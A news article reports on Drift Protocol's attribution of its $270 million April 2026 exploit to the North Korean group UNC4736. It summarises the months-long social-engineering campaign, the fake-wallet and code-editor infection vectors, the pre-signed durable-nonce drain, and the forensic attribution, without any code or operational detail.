Drift Links $270M Crypto Hack to Six-Month North Korean Spy Campaign

Key Points

• Drift links $270 million exploit to six-month UNC4736 intelligence operation.
• Attack combined social engineering, software exploits, and durable nonce transactions.

Drift Crypto Protocol has attributed its $270 million exploit on April 1, 2026, to a six-month operation conducted by UNC4736, a North Korean state-affiliated threat group also known as Citrine Sleet or AppleJeus.

The incident represents the largest recorded exploit of a native Solana decentralized application and reflects a prolonged infiltration strategy rather than a rapid, opportunistic breach.

Attackers reportedly posed as a quantitative trading firm and initiated contact during a major cryptocurrency conference in fall 2025.

They later deposited more than $1 million into an Ecosystem Vault and maintained routine engagement with contributors while building credibility within the protocol’s network.

Drift stated that the individuals who appeared at conferences across multiple countries were likely intermediaries using constructed professional identities consistent with previously documented DPRK-linked operations.

Six-Month Infiltration and Technical Vectors

According to the protocol’s disclosure, the group established communication channels through Telegram and engaged in discussions surrounding vault integrations and trading strategies.

Between December 2025 and January 2026, they completed onboarding processes typical for decentralized finance participants and operated within the ecosystem without triggering security alarms.

The intrusion involved two primary technical vectors identified during the investigation.

One was a TestFlight application presented as a proprietary wallet, enabling distribution outside Apple’s standard App Store review process.

The second leveraged a vulnerability in widely used code editors, including Cursor, where simply opening a file or folder could execute arbitrary code.

Security researchers had flagged this exploit method months before the incident.

After compromising contributor devices, attackers secured two multisig approvals necessary to pre-sign transactions using Solana’s durable nonce feature.

The pre-signed transactions remained inactive for more than a week before executing on April 1, draining $270 million in under one minute.

Drift reported that 41.72 million JLP tokens were swapped across decentralized exchanges before being bridged to Ethereum.

On-chain analysis linked fund flows to wallets associated with the October 2024 Radiant Capital exploit.

Attribution to UNC4736 was supported by blockchain analytics and forensic findings from Mandiant and SEALS 911, which assessed the connection with medium-high confidence.

The group is believed to operate under North Korea’s Reconnaissance General Bureau and has been connected to prior malware campaigns under the AppleJeus designation.

Drift indicated that further details may emerge in upcoming forensic reporting as investigators continue analyzing infrastructure overlaps and fund movements.